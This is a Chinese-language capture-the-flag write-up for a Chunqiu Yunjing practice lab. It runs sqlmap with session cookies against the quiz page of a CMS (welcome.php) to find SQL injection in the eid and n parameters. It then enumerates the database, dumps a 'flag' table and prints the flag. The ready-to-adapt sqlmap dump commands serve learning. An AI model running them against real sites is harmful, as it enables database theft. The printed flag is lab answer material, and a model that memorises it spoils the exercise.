这是一个CMS系统的漏洞,存在SQL注入漏洞。 本人是用春秋云境搭建的漏洞环境练习。
提示:welcome.php存在sql漏洞
打开网址,首页是一个登录页面。随意注册一个账号,然后登录。页面如下
此页面的地址http://eci-2ze9zit3gxb27s7e19j5.cloudeci1.ichunqiu.com/welcome.php?q=1
。
怀疑参数q存在注入漏洞,使用sqlmap注入后发现不是。
尝试点击第一行的start按钮,发现页面报错且网址还是welcome.php,页面如下
此页面地址http://eci-2ze9zit3gxb27s7e19j5.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34
这个页面GET参数比较多极有可能存在漏洞,使用sqlmap扫描
注意加上cookie
sqlmap --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1678841342; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1678842366; PHPSESSID=16864uie1cit4mf0v6pv5htfto" -u "http://eci-2ze9879e96d0q7yz98bn.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=10&t=10"
提示eid
参数和n
参数存在注入漏洞。继续扫描当前数据库
sqlmap --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1678841342; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1678842366; PHPSESSID=16864uie1cit4mf0v6pv5htfto" -u "http://eci-2ze9879e96d0q7yz98bn.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=10&t=10" --current-db
扫描到当前数据库为----ctf ,继续扫描库中的数据表
sqlmap --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1678841342; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1678842366; PHPSESSID=16864uie1cit4mf0v6pv5htfto" -u "http://eci-2ze9879e96d0q7yz98bn.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=10&t=10" -D "ctf" --tables
数据表一共9个,发现有一张表名flag
表,表中应该存着要找的flag,获取flag表数据
sqlmap --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1678841342; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1678842366; PHPSESSID=16864uie1cit4mf0v6pv5htfto" -u "http://eci-2ze9879e96d0q7yz98bn.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=10&t=10" -D "ctf" -T "flag" --dump
成功找到flag----flag{555f3edc-fdc3-4548-ae99-ff3d91107137}
使用sqlmap是比较快,但是有时间建议手工注入,能力提升的页比较快。